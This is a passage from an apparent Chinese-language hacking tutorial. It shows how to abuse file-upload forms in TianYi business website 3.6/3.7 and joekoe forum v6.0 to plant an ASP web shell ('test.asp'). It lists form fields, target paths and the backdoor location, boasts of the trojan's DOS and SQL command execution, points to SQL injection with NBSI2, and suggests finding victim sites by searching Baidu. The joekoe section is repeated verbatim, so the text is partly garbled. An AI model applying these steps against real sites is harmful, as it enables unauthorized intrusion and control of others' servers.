<tr><td>上傳圖片:</td><td><iframe frameborder=0 name=upload_frame width='100%' height=30 scrolling=no src='upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic'></iframe></td></tr>
表單存放在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表單中找參數(shù):
在瀏覽器中輸入:http://www.zr1*3.com/upload.a(chǎn)sp?action=gallery&upname=g2004927110356&uptext=pic'查看其源文件內(nèi)容:
<form name=form1 action='?action=upfile' method=post enctype='multipart/form-data'>
<input type=hidden name=up_path value='gallery'>
<input type=hidden name=up_name value='g2004927110356'>
<input type=hidden name=up_text value='pic'><tr>
<td><input type=file name=file_name1 value='' size=40></td>
<td align=center height=30><input type=submit name=submit value='點(diǎn)擊上傳'>
注意:在action中輸入http://www.zr1*3.com/upload.a(chǎn)sp?action=upfile;uppath第一個(gè)文本框中輸入:up_name,第二個(gè)中輸入上傳后的shell名稱test.asp;file 第一個(gè)文本框中輸入file_name1;參數(shù)如下圖12、13所示:
圖12
圖13
后門介紹:用的是血漢個(gè)人美化版!此木馬功能非常多,可算是木馬中的精典!第一:就算你得到了源代碼也看不到明文的密碼!第二:具有瀏覽,上傳,下載,復(fù)制,刪除,執(zhí)行dos命令,執(zhí)行sql命令,查看系統(tǒng)配置及nfso功能!
小提示:http://www.zr1*3.com/upload.a(chǎn)sp?action=upfile,以參數(shù)action=upfile一定不能丟?。?!如圖13所示,后門所在路徑為:upload/other/test.asp
5.【天意商務(wù)網(wǎng)】
天意商務(wù)網(wǎng)3.6、3.7版。在百度中搜索“天意商務(wù)網(wǎng)”,會(huì)找到很多裝有天意商務(wù)網(wǎng)的站點(diǎn)。它的add.asp文件中存在如下表單:
<form method="post" action="zs_save_add.asp" name="form1" nctype="multipart/form-data">
<input type="hidden" name="filepath" value="../../picture/">
<input type="file" class="f11" name="file" size="33"title=上傳產(chǎn)品圖片資料不能大于200k。(要求:250×250像素)>
這里也有一點(diǎn)不同,file的第一個(gè)文本框中要輸入file,“zs_save_add.asp”的確切位置是:“manage/spzs/zs_save_add.asp”,而且成功后也沒有出現(xiàn)“上傳成功”的對話框!參數(shù)如下圖10、11所示:
10圖
圖11
后門介紹:帶有名字,密碼,認(rèn)證,可以把它偽裝成一個(gè)后臺(tái)管理界面,而且功能也很多。
小提示:天意商務(wù)網(wǎng)系統(tǒng)有一個(gè)變量id過濾不嚴(yán),利用nbsi2很容易注入?。?br>⑥【喬客論壇】
所用版本:joekoe v6.0。這個(gè)是我在做實(shí)驗(yàn)過程中用時(shí)最多的一個(gè),因?yàn)閰?shù)太多,開始實(shí)驗(yàn)時(shí)總是報(bào)參數(shù)錯(cuò)誤。
首先來看如何找到我們用的表單:
在瀏覽中輸入http://www.zr1*3.com/user_put.asp?action=gallery(別忘了登錄噢?。┤缓蟛榭丛次募?nèi)容:
<tr><td>上傳圖片:</td><td><iframe frameborder=0 name=upload_frame width='100%' height=30 scrolling=no src='upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic'></iframe></td></tr>
表單存放在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表單中找參數(shù):
在瀏覽器中輸入:http://www.zr1*3.com/upload.a(chǎn)sp?action=gallery&upname=g2004927110356&uptext=pic'查看其源文件內(nèi)容:
<form name=form1 action='?action=upfile' method=post enctype='multipart/form-data'>
<input type=hidden name=up_path value='gallery'>
<input type=hidden name=up_name value='g2004927110356'>
<input type=hidden name=up_text value='pic'><tr>
<td><input type=file name=file_name1 value='' size=40></td>
<td align=center height=30><input type=submit name=submit value='點(diǎn)擊上傳'>
注意:在action中輸入http://www.zr1*3.com/upload.a(chǎn)sp?action=upfile;uppath第一個(gè)文本框中輸入:up_name,第二個(gè)中輸入上傳后的shell名稱test.asp;file 第一個(gè)文本框中輸入file_name1;參數(shù)如下圖12、13所示:
圖12
圖13
后門介紹:用的是血漢個(gè)人美化版!此木馬功能非常多,可算是木馬中的精典!第一:就算你得到了源代碼也看不到明文的密碼!第二:具有瀏覽,上傳,下載,復(fù)制,刪除,執(zhí)行dos命令,執(zhí)行sql命令,查看系統(tǒng)配置及nfso功能!
小提示:http://www.zr1*3.com/upload.a(chǎn)sp?action=upfile,以參數(shù)action=upfile一定不能丟?。。∪鐖D13所示,后門所在路徑為:upload/other/test.asp
新聞熱點(diǎn)
疑難解答
圖片精選